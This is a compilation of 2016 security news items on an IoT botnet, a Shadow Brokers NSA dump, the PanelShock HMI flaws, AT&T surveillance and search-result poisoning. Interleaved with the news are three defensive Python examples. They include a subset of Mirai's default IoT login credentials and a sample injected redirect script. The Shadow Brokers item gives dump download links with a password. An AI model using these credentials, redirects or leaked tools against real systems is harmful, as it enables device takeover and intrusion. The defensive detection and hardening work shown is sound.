The Flash Player bug was also being exploited in the wild against organizations in targeted attacks. According to Adobe, the flaw affected Windows 7, 8.1 and 10 systems.
Since the Windows zero-day vulnerability is being actively exploited in the wild, Google shared only basic details about the bug on Monday.
Microsoft Has Yet to Roll Out a Fix
Needless to say, Microsoft is not at all happy about the disclosure.
In response, Microsoft said Google's disclosure has potentially placed customers at risk, adding that the company believes in coordinated vulnerability disclosure.
"We believe in coordinated vulnerability disclosure, and today’s disclosure by Google puts customers at potential risk," a Microsoft spokesperson said in a statement. "Windows is the only platform with a customer commitment to investigate reported security issues and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection."
Microsoft has not provided any details as to when the company will roll out a fix for the flaw.
This is not the first time that Google and Microsoft have been at odds over vulnerability disclosure. Microsoft has a long history of troubled patches, and the public disclosure could push the company into rolling out an update quickly.
Meanwhile, users are advised to update their Flash software now and apply Windows patches as soon as they become available.
New IoT Botnet Malware Discovered; Infecting More Devices Worldwide
1.11.2016 thehackernews BotNet
The whole world is still dealing with the Mirai IoT botnet that caused a vast Internet outage on Friday, October 21, by launching massive distributed denial-of-service (DDoS) attacks against the DNS provider Dyn, and now researchers have found another nasty IoT botnet.
Security researchers at MalwareMustDie have discovered a new malware family designed to turn Linux-based insecure Internet of Things (IoT) devices into a botnet to carry out massive DDoS attacks.
Dubbed Linux/IRCTelnet, the nasty malware is written in C++ and, just like Mirai malware, relies on default hard-coded passwords in an effort to infect vulnerable Linux-based IoT devices.
The IRCTelnet malware works by brute-forcing a device's Telnet port, infecting the device's operating system, and then adding it to a botnet that is controlled over IRC (Internet Relay Chat), an application-layer protocol for text-based communication.
So, every infected bot (IoT device) connects to a malicious IRC channel and reads commands sent from a command-and-control server.
The concept of using IRC for managing the bots, according to the researchers, is borrowed from the Kaiten malware. The source code used to build the IRCTelnet botnet malware is based on the earlier Aidra botnet.
The malware uses the credential list from the leaked Mirai source code to brute-force Telnet ports exposed to the Internet.
The IRCTelnet malware infects insecure devices running Linux kernel version 2.6.32 or above and is capable of launching DDoS attacks with spoofed IPv4 and IPv6 addresses, though its scanner is programmed only to find and brute-force Telnet over IPv4.
"The botnet is having DoS attack mechanism like UDP flood, TCP flood, along with other attack methods, in both IPv4 and IPv6 protocol, with extra IP spoof option in IPv4 or IPv6 too," the researchers note in a blog post.
While analyzing the malware's source code, researchers found hard-coded Italian language messages in the user's communication interface, which suggests that the author of the IRCTelnet malware could be Italian.
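As an added example (not part of the article or of MalwareMustDie's analysis), the following Python code shows detection logic for the infection step described above, run over constructed honeypot-style Telnet log lines: it raises one alert when a single source makes too many login attempts within a sliding window, and another when a login succeeds with a username/password pair from the default-credential list widely reported from the leaked Mirai source. The log format, the timestamps and the thresholds are assumptions made for the example, and the credential list is a small subset.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed honeypot-style log lines (assumed format, not a real device's syslog).
# 203.0.113.5 behaves like an IRCTelnet/Mirai scanner; 192.0.2.10 is a legitimate admin.
SAMPLE_LOG = """\
2016-10-31T10:00:00 telnetd: login failed user='root' pass='vizxv' from 203.0.113.5
2016-10-31T10:00:05 telnetd: login failed user='root' pass='admin' from 203.0.113.5
2016-10-31T10:00:10 telnetd: login failed user='admin' pass='admin' from 203.0.113.5
2016-10-31T10:00:12 telnetd: login ok user='operator' pass='Correct-Horse-42' from 192.0.2.10
2016-10-31T10:00:15 telnetd: login failed user='root' pass='888888' from 203.0.113.5
2016-10-31T10:00:20 telnetd: login failed user='support' pass='support' from 203.0.113.5
2016-10-31T10:00:25 telnetd: login ok user='root' pass='xc3511' from 203.0.113.5
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) telnetd: login (?P<result>ok|failed) "
    r"user='(?P<user>[^']*)' pass='(?P<pw>[^']*)' from (?P<src>\S+)$"
)

# Small subset of the default credentials in the leaked Mirai source (the list
# IRCTelnet reuses); extend it from the public source for a real deployment.
IOT_DEFAULT_CREDS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "default"), ("support", "support"), ("root", "123456"),
}


def parse_line(line):
    """Return a dict for a matching log line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def detect(lines, window_seconds=60, threshold=5):
    """Sliding-window brute-force detection plus default-credential success alerts."""
    attempts = defaultdict(deque)   # source IP -> timestamps of recent attempts
    flagged = set()                 # sources already reported for brute force
    alerts = []
    for rec in filter(None, map(parse_line, lines)):
        src, now = rec["src"], rec["ts"]
        window = attempts[src]
        window.append(now)
        while now - window[0] > timedelta(seconds=window_seconds):
            window.popleft()
        if len(window) >= threshold and src not in flagged:
            flagged.add(src)
            alerts.append((src, f"{len(window)} telnet logins within {window_seconds}s (brute force)"))
        if rec["result"] == "ok" and (rec["user"], rec["pw"]) in IOT_DEFAULT_CREDS:
            alerts.append((src, f"successful login with known IoT default credential {rec['user']}/{rec['pw']}"))
    return alerts


if __name__ == "__main__":
    for src, reason in detect(SAMPLE_LOG.splitlines()):
        print(f"ALERT {src}: {reason}")
```

The second rule is the one that matters for a device that is already exposed: a successful login with a factory credential is the moment the device joins the botnet, and it should trigger a credential change and a check for an outbound IRC connection from that device, regardless of how many attempts preceded it.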
The researchers found around 3,400 bots infected by the IRCTelnet malware, and said that the malware was able to raise almost 3,500 bot clients within only 5 days.
The initial scans that distributed the IRCTelnet malware came from IP addresses located in Turkey, Moldova, and the Philippines.
A large botnet built on such an easily compromised device population invites more incidents like the recent DDoS attack against Dyn, which rendered major websites inaccessible, and the record-breaking DDoS attack against the French Internet service and hosting provider OVH.
NSA Hackers The Shadow Brokers leaked another dump with NSA targets
1.11.2016 securityaffairs BigBrothers
The ShadowBrokers hacker group leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The notorious Shadow Brokers hacker group has posted a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The hackers disclosed a list of historic targets of the Equation Group; it includes mail providers, Chinese targets, and universities.
The Equation group compromised the targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR.
The latest dump leaked by the Shadow Brokers was signed using the same key used to sign the first dump of Equation Group exploits.
The ShadowBrokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack, while the passphrase of the second was put up for ‘auction’, with the group asking for 1 million BTC.
The first archive contains roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.
The security researcher Mustafa Al-Bassam published an interesting post listing all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.
The Equation Group’s hackers targeted products made by Cisco, Fortinet (FortiGate), Juniper, TOPSEC, and WatchGuard.
The majority of the files are at least three years old; the newest timestamp dates to October 2013.
In early October, TheShadowBrokers complained that no one seemed to be bidding on their archive; an alleged member of the group expressed dissent at the lack of interest in ponying up bitcoins to release the full NSA data dump.
A couple of weeks ago the group announced a crowdfunding campaign for the stolen arsenal after its auction had received offers worth less than two bitcoins.
Back to the present day: the ShadowBrokers published a message accompanying the latest dump.
“TheShadowBrokers is having special trick or treat for Amerikanskis tonight. Why is DirtyGrandpa threating CIA cyberwar with Russia? Why not threating with NSA or CyberCommand? CIA is cyber B-Team, yes? Where is cyber A-Team? Maybe threating is not being for external propaganda? Maybe is being for internal propaganda? Oldest control trick in book, yes? Waving flag, blaming problems on external sources, not taking responsibility for failures. But neverminding, hacking DNC is way way most important than EquationGroup losing capabilities. Amerikanskis is not knowing USSA cyber capabilities is being screwed? Where is being “free press”? Is ABC, NBC, CBS, FOX negligent in duties of informing Amerikanskis? Guessing “Free Press” is not being “Free as in free beer” or “Free as in free of government influence?” reads the message.
According to security experts the list is very old. It is available at the following links:
https://mega.nz/#F!D1Q2EQpD!Lb09shM5XMZsQ_5_E1l4eQ
https://yadi.sk/d/NCEyJQsBxrQxz
Password = payus
Kevin Beaumont (@GossiTheDog) tweeted on 31 October 2016: “The Shadow Brokers continue to grapple for publicity and money. The list of servers is 9 years old, likely no longer exist or reinstalled.” https://twitter.com/shadowbrokerss/status/792936856925143040
A close look at the dump reveals that it contains some 300 folders of files, each corresponding to a different domain and IP address.
The well-known researcher Hacker Fantastic analyzed the dump and confirmed that it contains 306 domains and 352 IP addresses across 49 countries in total.
Hacker Fantastic (@hackerfantastic) tweeted on 31 October 2016: “306 domain names, 352 ip addresses contained in @shadowbrokerss leak, mostly ASIAPAC region. descriptions here http://pastebin.com/RK73grmu”
Hacker Fantastic (@hackerfantastic) added: “There are 49 countries impacted by the Solaris attack exposed by @shadowbrokerss - vast majority of those are in ASIAPAC region.”
The dump reveals targets in Russia, China, India, Sweden, and many other countries; the top 10 countries also include Japan and Italy.
My colleague Carola Frediani reported the presence of Italian targets, including systems at universities such as the Università dell’Aquila (sipralab.univaq.it; matematica.univaq.it; ns.univaq.it) and the Università degli Studi Mediterranea di Reggio Calabria (ns.ing.unirc.it).
Below is a graph from a preliminary study by the researcher Quequero (@quequero) of the addresses published by the ShadowBrokers and allegedly used by the NSA as staging servers/C&C.
The machines compromised by the US Intelligence may have been used to target systems worldwide and deliver exploits.
Mustafa Al-Bassam (@musalbas) tweeted: “New Shadow Brokers dump contains list of servers compromised by the NSA to use as exploit staging servers.”
Office of the Comptroller of the Currency reports that a former employee took data from the office
1.11.2016 securityaffairs Incident
A former employee of the Office of the Comptroller of the Currency downloaded 10,000 records onto thumb drives before his retirement in November 2015.
On Friday, the US banking regulator told Congress about a potential “major information security incident” after it discovered that a former employee had downloaded a large number of files onto thumb drives before his retirement in November 2015. According to the Office of the Comptroller of the Currency, there is no evidence that the former employee publicly disclosed or misused the data.
The Office of the Comptroller is tasked with protecting consumers and the orderly operation of financial markets.
The banking regulator confirmed that the former employee downloaded a large number of files onto two removable thumb drives; the removed information was encrypted. According to the OCC, the breach was only detected last month during a routine security assessment.
The OCC reported that when the former employee was contacted by the Agency, he “was unable to locate or return the thumb drives to the agency.”
“The OCC has deemed the breach a “major incident” because the devices containing the information are not recoverable and more than 10,000 records were removed, the agency said.” reported Reuters.
“An official familiar with the investigation declined to comment on a possible motive. The official, who was not authorized to discuss the case, noted that a large batch of unclassified personnel records were among the cache.”
Experts have downplayed the risk to users, arguing that the information was not released to unauthorized parties. It is quite common for employees or consultants to report missing thumb drives containing sensitive data.
Recently the National Security Agency made headlines again after a contractor was accused of having harvested highly sensitive information from the Agency’s systems.
PanelShock 0-day Vulnerability Puts Thousands of Schneider Electric HMI Panels, Industrial Control Systems and Critical Infrastructure at Risk
1.11.2016 securityaffairs Vulnerability
Security researchers at CRITIFENCE cyber security labs publicly announced this morning (November 1, 2016) major cyber security vulnerabilities affecting products of Schneider Electric, one of the world’s largest manufacturers of SCADA and industrial control systems.
The zero-day vulnerabilities, dubbed PanelShock, were found earlier this year by Eran Goldstein, CTO and founder of CRITIFENCE, a critical infrastructure, SCADA and industrial control systems cyber security firm. The PanelShock vulnerabilities were uncovered in collaboration with Check Point Software Technologies Ltd. CRITIFENCE released an advisory on the vulnerabilities.
“PanelShock disclose a new type of vulnerabilities in Schneider Electric’s SCADA Human Machine Interface (HMI) device panels. A low skills attacker can freeze and disconnect an HMI panel devices from the SCADA network remotely by exploiting these vulnerabilities. HMI panel devices allows operators and process engineers to monitor and control manufacture processes and field equipment, such as valves, pumps, engines, turbines, centrifuges and more.” says Eran Goldstein.
Schneider Electric is among the most common SCADA vendors in North America, Europe and worldwide; its products are used in nearly every modern automated factory or processing plant. The vulnerabilities affect all firmware versions of the Schneider Electric Magelis Advanced HMI panel series, including:
Magelis GTO Advanced Optimum panels
Magelis GTU Universal panel
Magelis STO & STU Small panels
Magelis XBT GH Advanced hand-held Panel
Magelis XBT GK Advanced Touchscreen Panels with Keyboard
Magelis XBT GT Advanced Touchscreen Panels
Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe)
The PanelShock vulnerabilities, CVE-2016-8367 (SVE-82003201) and CVE-2016-8374 (SVE-82003202), stem from improper handling of different HTTP request methods and an improper resource-consumption management mechanism in the Web Gate web service of the Magelis Advanced HMI panel series. By exploiting them, an attacker can “freeze” the panel remotely, disconnecting the HMI panel from the SCADA network and preventing it from communicating with PLCs and other devices. A supervisor or operator left with a frozen display can take wrong actions, which may further damage factory or plant operations.
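To illustrate the two weakness classes named in the CVEs in generic terms, here is an added Python example that is neither Schneider Electric’s Web Gate code nor an exploit: a naive HTTP request reader that accepts any method and buffers headers without limits, next to a hardened reader that restricts methods to the ones a panel status page needs, bounds line length, header count and body size, and rejects truncated requests. The limits and the sample requests are assumptions chosen for the demonstration.

```python
import io

# Limits chosen for the example; an embedded status page needs very little.
ALLOWED_METHODS = {"GET", "HEAD"}
MAX_LINE = 1024        # bytes per request line or header line
MAX_HEADERS = 32
MAX_BODY = 0           # the status page accepts no request body at all


class RequestRejected(Exception):
    def __init__(self, status, reason):
        super().__init__(f"{status} {reason}")
        self.status = status


def naive_read_request(stream):
    """Reads headers until a blank line with no limits at all: one client sending an
    endless or enormous header block keeps this code buffering for as long as it likes."""
    method, target, _version = stream.readline().decode("latin-1").rstrip("\r\n").split(" ", 2)
    headers = {}
    while True:
        line = stream.readline()
        if line in (b"", b"\r\n", b"\n"):
            break
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def hardened_read_request(stream):
    """Same job, but every read is bounded and the method is allow-listed."""
    request_line = stream.readline(MAX_LINE + 1)
    if len(request_line) > MAX_LINE:
        raise RequestRejected(414, "request line too long")
    parts = request_line.decode("latin-1").rstrip("\r\n").split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/1."):
        raise RequestRejected(400, "malformed request line")
    method, target, _version = parts
    if method not in ALLOWED_METHODS:
        raise RequestRejected(405, "method not allowed")
    headers = {}
    for _ in range(MAX_HEADERS + 1):
        line = stream.readline(MAX_LINE + 1)
        if len(line) > MAX_LINE:
            raise RequestRejected(431, "header line too long")
        if line in (b"\r\n", b"\n"):
            break
        if line == b"":
            raise RequestRejected(400, "truncated request")
        name, sep, value = line.decode("latin-1").partition(":")
        if not sep or not name.strip():
            raise RequestRejected(400, "malformed header")
        headers[name.strip().lower()] = value.strip()
    else:
        raise RequestRejected(431, "too many headers")
    length = headers.get("content-length", "0")
    if not length.isdigit() or int(length) > MAX_BODY:
        raise RequestRejected(413, "request body not accepted")
    return method, target, headers


def try_parse(parser, raw):
    """Run a reader over raw request bytes: ('ok', method, target) or ('rejected', status)."""
    try:
        method, target, _headers = parser(io.BytesIO(raw))
        return ("ok", method, target)
    except RequestRejected as exc:
        return ("rejected", exc.status)


if __name__ == "__main__":
    # Constructed requests: a normal status poll, a 200 KB header, and a disallowed method.
    good = b"GET /status HTTP/1.1\r\nHost: hmi.example\r\n\r\n"
    flood = b"GET /status HTTP/1.1\r\nX-Pad: " + b"A" * 200_000 + b"\r\n\r\n"
    post = b"POST /status HTTP/1.1\r\nHost: hmi.example\r\n\r\n"
    for raw in (good, flood, post):
        print(try_parse(naive_read_request, raw), try_parse(hardened_read_request, raw))
```

On a panel with a few megabytes of RAM and a single-threaded web service, the difference between the two readers is the difference between a status page that keeps answering and a device that needs a physical reboot; on a real socket the hardened reader would additionally set a per-connection receive timeout, which `io.BytesIO` cannot model.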
“Use of HMIs which are connecting to field installed PLCs must operate very reliable as the service engineer relies on the display for setting the operation parameters of PLCs which control the process. A security vulnerability in these devices might lead to a compound attack which can mask the view of on-site supervisors. During a malicious sabotage on the control system, the authorized and trained service person may perform a critical mistake and disruption of the control process”, says Daniel Ehrenreich, SCCE, SCADA-Cyber consultant, and trainer.
In addition, by exploiting the vulnerabilities the attacker can trigger unwanted behavior of a Harmony XVGU tower light connected to the HMI panel, such as starting an alarm or flashing red lights. In the demonstrated PanelShock attack, the target Schneider Electric Magelis GTO HMI lost its network connectivity and required a physical reboot to recover.
Proof of Concept (PoC) video of PanelShock Attack can be viewed here: https://youtu.be/Ehzs0mlMtbc
“Cyber security vulnerabilities commonly survive much longer in SCADA and Industrial Control Systems than in typical IT Networks”, says Eran Goldstein, CTO and Founder of CRITIFENCE. “In most scenarios SCADA and ICS hardware installed on client’s facilities are used as part of a production environment. In many cases, the hardware is installed in harsh environments and hard to reach places. This results in a much lower physical availability than any other network device. In addition, since these devices are in a production environment, disabling the device for a software update could cause much larger scale complications. Another important reason is that managers of such plants and facilities do not like tampering with devices if it’s working without any issues, as the saying goes – if it works, don’t touch it. So in many occasions, security managers would rather isolate the SCADA and ICS networks, and hardening the networks leading to that environment, than tampering with the actual devices”.
Following the disclosure, Schneider Electric confirmed that the Magelis HMI series products are vulnerable to the findings presented by CRITIFENCE and released an Important Security Bulletin (SEVD-2016-302-01). Once the vulnerabilities were acknowledged, CRITIFENCE, with support from ICS-CERT (Department of Homeland Security, DHS), worked with Schneider Electric to mitigate and remediate them and to create security updates for all Schneider Electric Magelis Advanced HMI panel series. ICS-CERT released an advisory and an alert for the PanelShock vulnerabilities. Schneider Electric is already working on a software update for the affected types of HMI panels.
For more information: Important Security Bulletin (SEVD-2016-302-01)
The major issue in remediating critical infrastructure, SCADA systems and OT networks is not just creating the specific security patch or firmware update that mitigates a zero-day vulnerability. “Fixing vulnerable SCADA equipment such as an HMI or PLC requires installing a software patch in most cases, or in some situations even reinstalling the firmware on the affected hardware. This process might cause downtime of the system and requires coordination of several teams as well as scheduled maintenance windows, which are hardly allowed in SCADA systems,” says Alexey Baltacov, advisory board member at CRITIFENCE.
As part of the disclosure, the CRITIFENCE Critical Infrastructure and SCADA/ICS Cyber Threats Research Group released a free tool that actively checks specifically for the PanelShock vulnerabilities, CRITIFENCE PanelShockVCT (Vulnerability Check Tool), which can be downloaded here: http://www.critifence.com/vct/panel_shock
“The vast majority of SCADA and ICS devices are based on legacy hardware components, so many devices succumb to vulnerabilities that could be handled easily by more robust hardware. Feeble CPUs, low-memory hardware and outdated operating systems are not uncommon in the field of SCADA and ICS. Yet not many security researchers have access to this kind of device. While anyone at home can download web server software and try to find vulnerabilities, not that many people overall have access to a PLC which is not part of a production environment. The elevated security of many common network components is partly a result of the vendors’ work, and partly a result of self-assigned security researchers that find vulnerabilities. Since there is low exposure of SCADA and ICS devices to security researchers, the security level relies exclusively on vendors’ efforts,” says Eyal Benderski, manager of the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group at CRITIFENCE.
About the Authors
CRITIFENCE is a critical infrastructure, SCADA and industrial control systems cyber security firm.
The company developed and provides SCADAGate+, a passive cyber security technology for critical infrastructure, SCADA and industrial control systems visibility and vulnerability assessment, which monitors and analyzes OT network security events and vulnerabilities entirely passively. The CRITIFENCE development team and the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group are made up of experienced SCADA and cyber security experts and researchers from the IDF’s Technology & Intelligence Unit 8200 (Israel’s NSA).
For more information about CRITIFENCE refer to: http://www.critifence.com
Mass Surveillance of Cell Phone Data by AT&T Service Provider
31.10.2016 securityaffairs Incident
AT&T has been data-mining and willingly sharing user phone data, through its “Hemisphere” Project, which is essentially a mass surveillance program.
The NSA may be the governmental entity best known for spying on its own citizens and for its massive record retention program, but the private sector is also capitalizing on such opportunities. AT&T, a telecommunications conglomerate with diversified revenues of more than $146 billion reported in 2015, is branching out by selling its “Hemisphere” services to the US Justice Department. Through the Hemisphere project, which is essentially a mass surveillance program, AT&T has been data-mining and willingly sharing user phone data. The Hemisphere program, first whispered about as early as 2013, reportedly draws on call data retained by the phone company dating back to the 1980s.
AT&T has not commented publicly on the program, but the published documents show that the telephone company provides the service through its existing infrastructure, for additional fees paid by the buyer, of course.
AT&T has collected and retained phone call logs and other metadata in an extensive database covering 380 million users. Research conducted by the NSA has shown that telephone metadata can reveal sensitive personal information about the user. The collected metadata consists of non-content information about calls, which can nonetheless pose a threat to user privacy.
Image: The logo of the “Hemisphere Project” (AT&T)
Verizon Communications has also been the subject of a compliance order issued by the U.S. Foreign Intelligence Surveillance Court that required it to hand over electronic data to the NSA. This covered all calling records, produced on a daily basis, without any disclosure to the user. The order covered the location, frequency and duration of calls but not the content of the communication. Users are not aware of any such collection, and they need not be the subject of any criminal investigation for it to take place.
Previously, the NSA might have been the only entity with the resources and infrastructure to conduct surveillance at this scale and to house the resulting data. AT&T’s access to its hundreds of millions of customers, however, gives the company ample opportunity and infrastructure to collect data on everything that happens within its network: who communicated with whom, what, when and where. Combined with the location data cell phones provide, this leaves a distinct digital trail that law enforcement can follow. The volume of information is enormous, especially given AT&T’s market share and reach; its landline customers alone account for more than 75% of the market.
The published documents confirm a link between the collection of phone data and the formation of an “alliance” with law enforcement agencies, which are eager for the information AT&T’s vast network provides. The revenue AT&T receives for the service, however morally or ethically ambiguous, amounts to millions of dollars per year.
AT&T’s willingness to data-mine the information itself is what makes this alliance unusual. Normally a private entity hands over such information only under a legal warrant; AT&T actively seeking an alliance (a sort of public-private partnership) with a governmental agency is a rather different arrangement.
Cell phone providers have rarely played such a cooperative role in the past, and certainly not such a profitable one. The FBI’s battle with Apple over the San Bernardino shooter’s iPhone showed Apple publicly opposing any such alliance: it refused to build software that would unlock the shooter’s iPhone, arguing that creating what amounts to a backdoor would set a dangerous precedent. Apple thus took a stand against the invasion of cell phone privacy by refusing to cooperate with investigators even in a terrorism case. AT&T has no such reservations.
Formerly, the NSA had legal authority to access phone user records under the USA PATRIOT Act of 2001. Some of the same powers are now available under the USA FREEDOM Act (2015), but with more restrictive guidelines. The NSA is also facing several lawsuits filed by the American Civil Liberties Union (ACLU) over its controversial bulk collection of phone data. Several rulings have rejected the ACLU’s claim on the basis that:
“While others who have brought legal challenges to the bulk collection program, plaintiffs [in this case] lack direct evidence that records involving their calls have actually been collected.”
AT&T’s stance, as revealed by these documents, is at odds with Snowden’s views on the matter.
Image: Edward Snowden on the cover of Time in 2013.
Edward Snowden, in an interview with European reporters on October 26, 2016, further fueled the public debate on mass surveillance by cell phone service providers. Snowden argued that the public is unable to stop targeted surveillance by huge government programs, and that the same priorities lie behind the massive data breaches and cyber-attacks of recent years:
“In our current state of the art, offense is easier than defense. This is an unfortunate artifact of the fact that governments around the world have prioritized offensive capabilities for the benefit of spying on people so much more strongly than they have defensive capabilities, preventing our countries from being hacked”.
Snowden’s comments on AT&T’s cooperation with governmental agencies suggest that those agencies focus most of their resources on the offensive end, leaving themselves poorly placed to defend against massive data breaches and hacks. Because defense is neglected, vulnerabilities get exploited, as evidenced by the cyber-attack on the Office of Personnel Management, the recent Democratic National Committee hacks, and other attacks on infrastructure. These could have been prevented by a focus on bolstering defense:
“[Its] fear of the power grid being attacked—these were preventable problems”- Edward Snowden
If such cyber-attacks can compromise private companies and government agencies, what is the defense against a similar compromise in critical sectors such as energy or manufacturing? Reports published in 2015 have in fact stated that the US energy sector is not prepared to defend itself against cyber threats.
Snowden’s reasoning is not wrong; he makes a justifiable argument. His narrative has consistently warned of mass surveillance carried out without the public’s knowledge, and he sacrificed his career to report breaches of user privacy by intelligence agencies. The former NSA contractor is a whistle-blower who exposed the questionable practices of his employer, a government agency, and he remains an advocate for safeguarding user privacy from surveillance agencies.
You may ask, “If AT&T volunteers user phone information, is it still illegal?” The answer lies somewhere in the middle. In essence, this is capitalism at its finest, an exchange between buyer and seller that constitutes a business transaction: the information at the heart of the debate is legitimized at the source and wrapped in an added financial incentive. However, the threat that mass surveillance poses to user privacy is a very real one, and not just in the U.S.
AV-TEST study sees search engine results even more poisoned with malicious links
31.10.2016 securityaffairs Safety
According to a study published by the independent anti-virus testing outfit AV-TEST, the number of malicious search engine results has been increasing.
The vast majority of Internet users blindly trust the results that search engines return for their queries. In fact, search engine results are increasingly poisoned with malicious links, and the experts observed a significant increase in the phenomenon compared to the past.
It has been estimated that poisoned search engine results appeared almost six times as often this year as in 2013.
The threat is serious: Google and other search engines more and more frequently return malicious links in their results, leading to compromised websites used by crooks to deliver malware.
According to the AV-TEST study, the number of malicious search engine results has been increasing year on year since 2013. The data is worrisome considering that defensive solutions have grown more sophisticated over the same period.
The study analyzed search engine results for various queries on Google, Bing, Yandex and Faroo. Over the past two years the experts also analyzed more than 515 million Twitter updates for malicious links.
“Search engines such as Google and others provide access to roughly more than 1 billion websites and globally handle 4 to 6 billion search queries – daily.” reads the study. “AV-TEST analyzed 80 million websites and discovered an unsettling trend.
“the number of infected results has been increasing year by year since 2013, despite the fact that search engine operators use many tools and technologies to try to filter them out.”
In 2015, experts at AV-TEST.org examined 80 million websites and identified 18,280 infected web pages; in 2016, up to August, the organization inspected 81 million websites and found 29,632 infected web pages.
It is important to note that the search engine results were recorded with the Google Safe Browsing feature disabled.
“Both evaluations from AV-TEST through the year 2015 up until August 2016 ultimately yield two important final results (without Google safe browsing)” reads the study.
2015, 80 million websites examined: 18,280 infected web pages
2016 (up to Aug.), 81 million websites examined: 29,632 infected web pages
Both figures are disconcerting when compared with the search engine results obtained in a past study dated 2013.
“By comparison: already in 2013, among roughly 40 million web pages examined, 5,060 malware threats were found. You don’t need to be a mathematician to see this clear growth trend.” continues the study.
The researchers also performed a sort of counter-test, visiting the pages with malware threats found by AV-TEST with Google Safe Browsing enabled. They reported the following results:
2015: 18,280 pages with malware threats, 555 Google warnings
2016: 29,632 pages with malware threats, 1,337 Google warnings
Maik Morgenstern, chief technology officer at AV-TEST.org, attributed the discrepancy in the number of threats flagged to the dynamic content of the web pages: different tools see different content each time they access a site, for example rotating malicious ads.
“It could be the ads on the website that have been flagged as suspicious by us and that changes every time you access the site,” said Morgenstern. “Or the website is delivering different content randomly or it does so by checking the user agent or location of the user.”
“Also I do not know what the interval is that Google/Bing are scanning the sites for malware. There will always be a certain timeframe where malicious content could be on the site without Google/Bing knowing it, even if they were able to detect it. It is also possible that we flagged content as suspicious that is not considered suspicious by Google/Bing.”
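The user-agent and location cloaking Morgenstern describes is something a defender can test for directly: request the same URL under several request profiles, normalize away content that legitimately changes between fetches, and see whether the differences track the profile rather than time. The Python below is an added example, not code from AV-TEST or from the study; the profile names, the normalize() heuristics and fake_fetch (a constructed stand-in for a compromised site that only injects a redirect for browsers arriving from a Google results page) are assumptions made for the illustration. http_fetch is a real urllib fetcher for use against sites you are authorized to test.

```python
import hashlib
import re
import urllib.request

# Request profiles to compare. Cloaking kits key on the crawler's User-Agent
# and on a search-engine Referer, so both dimensions are varied (assumed set).
PROFILES = {
    "googlebot": {
        "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    },
    "browser_direct": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/54.0 Safari/537.36",
    },
    "browser_from_search": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/54.0 Safari/537.36",
        "Referer": "https://www.google.com/search?q=example",
    },
}


def normalize(html: str) -> str:
    """Strip what legitimately differs between fetches (comments, whitespace,
    nonces, epoch timestamps) so only real content differences remain."""
    html = re.sub(r"<!--.*?-->", "", html, flags=re.S)
    html = re.sub(r'(nonce|csrf|token)="[^"]*"', r'\1=""', html, flags=re.I)
    html = re.sub(r"\b\d{10,13}\b", "0", html)
    return re.sub(r"\s+", " ", html).strip().lower()


def http_fetch(url: str, headers: dict) -> str:
    """Real fetcher; not used by the offline demonstration below."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def cloaking_report(fetch, url: str, profiles=PROFILES, repeats: int = 2) -> dict:
    """Fetch url under each profile `repeats` times. Profiles whose normalized
    content is stable across repeats but differs from other profiles indicate
    cloaking; content that changes between repeats of the same profile is just
    dynamic (ad rotation) and is listed separately instead of being flagged."""
    def digest(body):
        return hashlib.sha256(normalize(body).encode()).hexdigest()[:12]
    per_profile = {name: {digest(fetch(url, hdrs)) for _ in range(repeats)}
                   for name, hdrs in profiles.items()}
    dynamic = sorted(n for n, d in per_profile.items() if len(d) > 1)
    stable = {n: next(iter(d)) for n, d in per_profile.items() if len(d) == 1}
    groups = {}
    for name, h in stable.items():
        groups.setdefault(h, []).append(name)
    return {"url": url, "groups": groups, "dynamic_profiles": dynamic,
            "cloaked": len(groups) > 1}


def fake_fetch(url: str, headers: dict) -> str:
    """Constructed stand-in for a compromised site: clean page for the crawler
    and for direct visitors, injected redirect only for browsers that arrive
    from a Google search results page."""
    page = "<html><body><h1>Welcome</h1><!-- build 1477000000 --><p>Content</p></body></html>"
    ua, ref = headers.get("User-Agent", ""), headers.get("Referer", "")
    if "Googlebot" not in ua and "google." in ref:
        page = page.replace("</body>", '<script>location.href="http://landing.invalid/x"</script></body>')
    return page


if __name__ == "__main__":
    print(cloaking_report(fake_fetch, "http://victim.invalid/"))
```

Running the report against fake_fetch groups the crawler and the direct browser together and isolates the search-referred browser, which is exactly the split a scanner like Google's would miss if it never sends a search Referer. Pass http_fetch instead of fake_fetch to run it for real, and raise repeats on sites that rotate ads.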
Crooks earned at least $1.35m with spamming campaigns
31.10.2016 securityaffairs Spam
Authorities identified a man in Florida that powered spamming campaigns abusing an army of corporate servers and private email accounts.
Spam is still a profitable business for crooks; to give you an idea of how these cyber criminals work, let me share the story of the leader of a spamming gang.
Timothy Livingston (31), from Fort Lauderdale, Florida, used an army of compromised corporate servers and private email accounts to send out spam messages. He has pleaded guilty to charges of computer hacking and identity theft; together with two accomplices he ran A Whole Lot of Nothing (AWLN), LLC.
The company served as a front for the suspects’ illegal activities: between January 2012 and June 2015 it earned hundreds of thousands of dollars running spamming campaigns for illicit drugs.
According to court documents, Livingston was charging advertisers between $5 and $9 for every spam email that resulted in a sale of an illegal product.
